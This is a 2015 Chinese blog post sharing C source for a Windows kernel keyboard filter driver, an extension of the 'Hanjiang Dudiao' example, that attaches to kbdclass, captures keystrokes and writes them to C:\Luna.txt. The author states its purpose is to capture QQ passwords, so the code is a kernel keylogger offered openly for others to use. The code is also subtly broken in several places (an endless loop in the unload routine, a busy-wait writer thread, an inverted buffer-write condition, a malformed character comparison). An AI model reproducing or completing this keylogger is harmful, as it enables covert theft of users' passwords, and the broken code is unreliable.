Windows驱动过滤--kdbclass过滤,寒江独钓加强版

寒江独钓键盘过滤,修改了下,过滤QQ密码写入buff,有 回车 或者buff满写入文件,因为irp完成,irp对应的内存快回收,所以用全局缓冲区。开启一个线程写入,开始打算用队例一个一个处理irp的,但是发现那样比较缓慢,只好这样了。。创建进程回调代码加几行就行,这里没写,因为代码丢失了,算是个大概的代码吧。给初学的分享下。有错指出,谢谢。

前辈们不要见笑了。

 

 

struct.h

/************************************/
//author:DuanYueming
//data: 02/05/2015
//File: Lstruct.h 
/************************************/
#ifndef _LSTRUCT_H_
#define _LSTRUCT_H_

typedef struct _DEVICE_EXTENSION 
{
	PDEVICE_OBJECT pDeviceObj;
	PDEVICE_OBJECT pAttachDev; //上层设备
	PDEVICE_OBJECT pLowDevice; //底层设备
	PDEVICE_OBJECT pStorageDev; //存储的设备
	PDEVICE_OBJECT pTarDevice; //目标设备
	UNICODE_STRING MyDeviceName;
	UNICODE_STRING MyDeviceSym;
	ULONG pMyDevFlg;
	IO_REMOVE_LOCK MoveLock;
}DEVICE_EXTENSION,*PDEVICE_EXTENSION;

typedef struct _MultVar
{
  PVOID pBuff;
  KEVENT WaitEvent;
  ULONG  Length;
}MULTVAR,*PMULTVAR;

#define  BUFF_SIZE 256

typedef struct _MY_BUFF
{
	PUCHAR pBuf;
	int MaxSize;
	int CurSize;
	int Offset;

}MYBUFF,*PMYBUFF;




typedef struct  _MY_DATA
{   
	PIRP Irp;
	PVOID pBuff;
	LIST_ENTRY ListEntry;
}MY_DATA,*PMYDATA;

  

#define  MyDeviceFlags 'LUNA'
#define  MyCdoDeviceFlags 'LCdo'
#define  RemoveTag  'Lmn'
#define DELAY_ONE_MICROSECOND   (-10)
#define DELAY_ONE_MILLISECOND   (DELAY_ONE_MICROSECOND*1000)
#define DELAY_ONE_SECOND        (DELAY_ONE_MILLISECOND*1000)

#define IS_MY_DEVICE_OBJECT(_obj)  \
	(((PDEVICE_EXTENSION)_obj->DeviceExtension)->pMyDevFlg == MyCdoDeviceFlags || PDEVICE_EXTENSION(_obj->DeviceExtension)->pMyDevFlg == MyDeviceFlags)

#define IS_MY_CONTROL_DEVICE(_obj)  \
	(((PDEVICE_EXTENSION)_obj->DeviceExtension)->pMyDevFlg == MyCdoDeviceFlags)

  

/********未归档函数************/
NTSTATUS
	ObReferenceObjectByName(
	PUNICODE_STRING ObjectName,
	ULONG Attributes,
	PACCESS_STATE AccessState,
	ACCESS_MASK DesiredAccess,
	POBJECT_TYPE ObjectType,
	KPROCESSOR_MODE AccessMode,
	PVOID ParseContext,
	PVOID *Object
	);

extern POBJECT_TYPE *IoDriverObjectType;

  

NTSTATUS LQueryObjectName(PVOID Lobject,PUNICODE_STRING name)//查询文件名
{
	NTSTATUS status;
	POBJECT_NAME_INFORMATION pBuff;
	WCHAR cache[64];
	ULONG NeedLength;
	pBuff = (POBJECT_NAME_INFORMATION)cache;
	status = ObQueryNameString(Lobject,pBuff,64*sizeof(WCHAR),&NeedLength);
	if (status == STATUS_INFO_LENGTH_MISMATCH)
	{
		pBuff =(POBJECT_NAME_INFORMATION) ExAllocatePool(NonPagedPool,NeedLength);
		if (pBuff == NULL)
		{
			return STATUS_INSUFFICIENT_RESOURCES;
		}
		RtlZeroMemory(pBuff,NeedLength);
		status = ObQueryNameString(Lobject,pBuff,NeedLength,&NeedLength);
	}
	name->Length = 0;
	RtlCopyUnicodeString(name,&pBuff->Name);
	return status;
}

VOID LUnInstallDriver(PDRIVER_OBJECT pDriverObject)
{  
	PDEVICE_EXTENSION pDevExt;
	PRKTHREAD CurrentThread;
	LARGE_INTEGER time;
	PDEVICE_OBJECT  pDevObj;
	time = RtlConvertLongToLargeInteger(100*DELAY_ONE_SECOND);
	pDevObj = pDriverObject->DeviceObject;
	CurrentThread = KeGetCurrentThread();
	KeSetPriorityThread(CurrentThread,LOW_REALTIME_PRIORITY);

	while (pDevObj)
	{
		pDevExt =(PDEVICE_EXTENSION) pDevObj->DeviceExtension;
		IoDeleteSymbolicLink(&pDevExt->MyDeviceSym);
		pDevObj = pDevObj->NextDevice;
		IoDetachDevice(pDevExt->pLowDevice);
		IoDeleteDevice(pDevExt->pDeviceObj);
	}
	while (1)
	{

	}



	KdPrint(("Driver UnInstall Complete,leave\n"));
}
NTSTATUS LDispatchRoutine(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{   
	PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(pIrp);
	IoSkipCurrentIrpStackLocation(pIrp);
	return  IoCallDriver(((PDEVICE_EXTENSION)pDeviceObject->DeviceExtension)->pLowDevice,pIrp);
}

  以下是代码:

#include "QFilter.h"


NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath)
{
	int i;
	NTSTATUS status;
	HANDLE Thread;
	
	/********初始化全局变量***********/
	IsWriteData = FALSE;
	IsNeedFilter = FALSE;
	InitializeListHead(&g_list);
	
	g_buff =(PMYBUFF) ExAllocatePool(NonPagedPool,sizeof(MYBUFF));
	if (g_buff ==NULL)
	{
		KdPrint(("no through memory \n"));
		return 0;
	}
	else
	{
		g_buff->pBuf =(PUCHAR)ExAllocatePool(NonPagedPool,BUFF_SIZE);
		ASSERT(g_buff->pBuf);
		g_buff->MaxSize = BUFF_SIZE;
		g_buff->Offset = 0;
		g_buff->CurSize = 0;
	}

	/********初始化全局变量***********/
	pDriverObject->DriverUnload = LUnInstallDriver;
	for (i = 0;i <IRP_MJ_MAXIMUM_FUNCTION;i++)
	{
		pDriverObject->MajorFunction[i] = LDispatchRoutine;
	}

	pDriverObject->MajorFunction[IRP_MJ_READ] = ReadRoutine;
	pDriverObject->MajorFunction[IRP_MJ_POWER] = PowerRoutine;
	pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ContrlRoutine;
	//pDriverObject->MajorFunction[IRP_MJ_CLOSE] = CloseIrp;


	status = CreateMyCDODevice(pDriverObject);
	if (!NT_SUCCESS(status))
	{
		return status;
	}
	status = BindKbdDriver(pDriverObject);
	if (!NT_SUCCESS(status))
	{
		return status;
	}
	status = PsCreateSystemThread(&Thread,GENERIC_ALL,NULL,NULL,NULL,ProcessIrp,NULL);
	if (!NT_SUCCESS(status))
	{
		KdPrint(("Create Thread Failed \n"));
		return status;
	}
	KdPrint(("Start Kbd Filter SuccessFuly \n"));
	return STATUS_SUCCESS;
}
VOID ProcessIrp(PVOID pContext)
{   
//	PMYDATA data;
	PVOID buff = NULL;
    for (;;)
    {
    //    PLIST_ENTRY HeadData = RemoveHeadList(&g_list);	
	//	data = CONTAINING_RECORD(HeadData,MY_DATA,ListEntry);
		if (IsWriteData == TRUE&& g_buff->pBuf != NULL)
		{  
			KdPrint(("hehehehe\n"));
			KdPrint(("111\n"));
			KdPrint(("2222\n"));
			MyWriteDataFile();
			RtlZeroMemory(g_buff->pBuf,g_buff->MaxSize);
			g_buff->CurSize = 0;
			g_buff->Offset = 0;
		}
    }
}


NTSTATUS PowerRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp)
{
   PoStartNextPowerIrp(pIrp);
   IoSkipCurrentIrpStackLocation(pIrp);
   return PoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp);
}
NTSTATUS CreateMyCDODevice(PDRIVER_OBJECT pDriverObj)
{
	NTSTATUS status;
	UNICODE_STRING DevSym;
	UNICODE_STRING DevName;
	PDEVICE_OBJECT pNewDev;
	PDEVICE_EXTENSION pDevExt;
	RtlInitUnicodeString(&DevName,L"\\Device\\QFilter");
	
	status = IoCreateDevice(pDriverObj,sizeof(DEVICE_EXTENSION),&DevName,FILE_DEVICE_UNKNOWN,0,TRUE,&pNewDev);
	if (!NT_SUCCESS(status))
	{
	   KdPrint(("Create CDO DevObj Failed \n"));
	   return status;
	}
	RtlInitUnicodeString(&DevSym,L"\\??\\QFilterSym");
    status = IoCreateSymbolicLink(&DevSym,&DevName);
	if (!NT_SUCCESS(status))
	{
		KdPrint(("Create Cdo Symbolic Failed \n"));
		IoDeleteDevice(pNewDev);
		return status;
	}
	pNewDev->Flags |=DO_BUFFERED_IO;
	pDevExt = (PDEVICE_EXTENSION)pNewDev->DeviceExtension;
	pDevExt->pMyDevFlg = MyCdoDeviceFlags;
	pDevExt->MyDeviceName = DevName;
	pDevExt->pDeviceObj = pNewDev;
	pDevExt->MyDeviceSym = DevSym;
	
	return STATUS_SUCCESS;
}

NTSTATUS BindKbdDriver(PDRIVER_OBJECT pDriverObj)
{
	UNICODE_STRING kbdClass;
	PDEVICE_OBJECT pNewDev;
	PDEVICE_OBJECT pTarDev;
	PDEVICE_OBJECT pLowDev;
	PDEVICE_EXTENSION pDevExt;
	PDRIVER_OBJECT pKbdDrOb;
	NTSTATUS status = STATUS_SUCCESS;

	RtlInitUnicodeString(&kbdClass,L"\\Driver\\kbdclass");
	status = ObReferenceObjectByName(&kbdClass,OBJ_CASE_INSENSITIVE,NULL,0,*IoDriverObjectType,KernelMode,NULL,(PVOID*)&pKbdDrOb);
	if (!NT_SUCCESS(status))
	{
		KdPrint(("Load KbdObj Failed :%x\n",status));
		return status;
	}

	ObDereferenceObject(pKbdDrOb);
	pTarDev = pKbdDrOb->DeviceObject;
	while (pTarDev)
	{
		status = IoCreateDevice(pDriverObj,sizeof(DEVICE_EXTENSION),NULL,pTarDev->DeviceType,pTarDev->Characteristics,FALSE,&pNewDev);
		if (!NT_SUCCESS(status))
		{
			KdPrint(("Create Device Failed:%x\n",status));
			return status;
		}
		else
		{
			status = IoAttachDeviceToDeviceStackSafe(pNewDev,pTarDev,&pLowDev);
			if (!NT_SUCCESS(status))
			{    
				KdPrint(("Bind Failed \n"));
				return status;
			}
		    pDevExt = (PDEVICE_EXTENSION)pNewDev->DeviceExtension;
			pNewDev->Flags |= pLowDev->Flags&(DO_BUFFERED_IO | DO_DIRECT_IO |DO_POWER_PAGABLE);
			pNewDev->Flags &= ~DO_DEVICE_INITIALIZING;
			pDevExt->pDeviceObj = pNewDev;
			pDevExt->pMyDevFlg = MyDeviceFlags;
			pDevExt->pLowDevice = pLowDev;
			pDevExt->pAttachDev = pTarDev;
			pNewDev->StackSize = pDevExt->pLowDevice->StackSize+1;
			//IoInitializeRemoveLock(&pDevExt->MoveLock,0,0,0);
		}
		pTarDev = pTarDev->NextDevice;
	}
	RtlInitUnicodeString(&FileName,L"\\DosDevices\\C:\\Luna.txt");
	KdPrint(("Complete Device Bind \n"));
	return STATUS_SUCCESS;
}

VOID MyWriteDataFile()
{   
	HANDLE handl;
	OBJECT_ATTRIBUTES objAttr;
	IO_STATUS_BLOCK block;
	NTSTATUS status;
    InitializeObjectAttributes(&objAttr,&FileName,OBJ_CASE_INSENSITIVE,NULL,NULL);
	status = ZwCreateFile(&handl,GENERIC_WRITE,&objAttr,&block,NULL,FILE_ATTRIBUTE_NORMAL,0,FILE_OPEN_IF,FILE_SYNCHRONOUS_IO_NONALERT,NULL,0);
	if (!NT_SUCCESS(status))
	{
		KdPrint(("Create File Storage data Failed:%x",status));
		return;
	}
		status = ZwWriteFile(handl,NULL,NULL,NULL,&block,g_buff->pBuf,g_buff->CurSize,0,NULL);
		if (!NT_SUCCESS(status))
		{
			KdPrint(("WriteFile Failed:%X \n",status));
			ZwClose(handl);
			return;
		}
		KdPrint((" code:%C \n",g_buff->pBuf));
 	ZwClose(handl);
}

NTSTATUS ReadCompleteFun(PDEVICE_OBJECT pDeviceObj,PIRP pIrp,PVOID pContext)
{   
	ULONG KeyStructNum;
	PKEYBOARD_INPUT_DATA ptr;
	ULONG i;
	UCHAR ASCIICODE;
	if(/*IsNeedFilter &&*/NT_SUCCESS(pIrp->IoStatus.Status)  )
	{
	   KeyStructNum = pIrp->IoStatus.Information/(pIrp->IoStatus.Information/sizeof(KEYBOARD_INPUT_DATA));
	   ptr =(PKEYBOARD_INPUT_DATA) pIrp->AssociatedIrp.SystemBuffer;
	   for (i =0 ;i <KeyStructNum;++i)
	   {   
		      ASCIICODE = print_keystroke(ptr[i].MakeCode);
		   if(g_buff->Offset >= (BUFF_SIZE-(5*UCHARSIZE)) || ASCIICODE == '0x0D')
		   {    			  
			   KdPrint(("steup write data!!!!!!!!!!!!!!!!!!!\n"));
			   IsWriteData =TRUE;
			   RtlCopyMemory(((g_buff->pBuf)+(g_buff->Offset)),&ASCIICODE,UCHARSIZE);
			   g_buff->Offset += UCHARSIZE;
			   g_buff->CurSize +=UCHARSIZE;
		   }
		   else
		   { 
			   IsWriteData =FALSE;
			   KdPrint(("------buff small---Start Write Data to File-- \n"));
		   }
	   }
	}
   
   if (pIrp->PendingReturned)
   {
	   IoMarkIrpPending(pIrp);
   }
	return pIrp->IoStatus.Status;
}

NTSTATUS ReadRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp)
{
   PIO_STACK_LOCATION stack;
   NTSTATUS status = STATUS_SUCCESS;
   if (pIrp->CurrentLocation ==1)
   {
	   pIrp->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST;
	   pIrp->IoStatus.Information = 0;
	   IoCompleteRequest(pIrp,IO_NO_INCREMENT);
	   return STATUS_INVALID_DEVICE_REQUEST;
   }
   if (IS_MY_CONTROL_DEVICE(pDeviceObj))
   {
	   pIrp->IoStatus.Status = STATUS_SUCCESS;
	   pIrp->IoStatus.Information = 0;
	   IoCompleteRequest(pIrp,IO_NO_INCREMENT);
	   return STATUS_SUCCESS;
   }
 
   stack = IoGetCurrentIrpStackLocation(pIrp);
   IoCopyCurrentIrpStackLocationToNext(pIrp);
   IoSetCompletionRoutine(pIrp,ReadCompleteFun,NULL,TRUE,TRUE,TRUE);
  return IoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp);

}

NTSTATUS ContrlRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp)
{
	PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(pIrp);

	if (IS_MY_CONTROL_DEVICE(pDeviceObj))
	{
		switch(stack->Parameters.DeviceIoControl.IoControlCode)
		{
			

		}
	}



	switch(stack->Parameters.DeviceIoControl.IoControlCode)
	{
	default:
		  IoSkipCurrentIrpStackLocation(pIrp);
		  return IoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp);
	}

}

  

posted @ 2015-03-03 20:49  落雪成冰  阅读(1104)  评论(0编辑  收藏  举报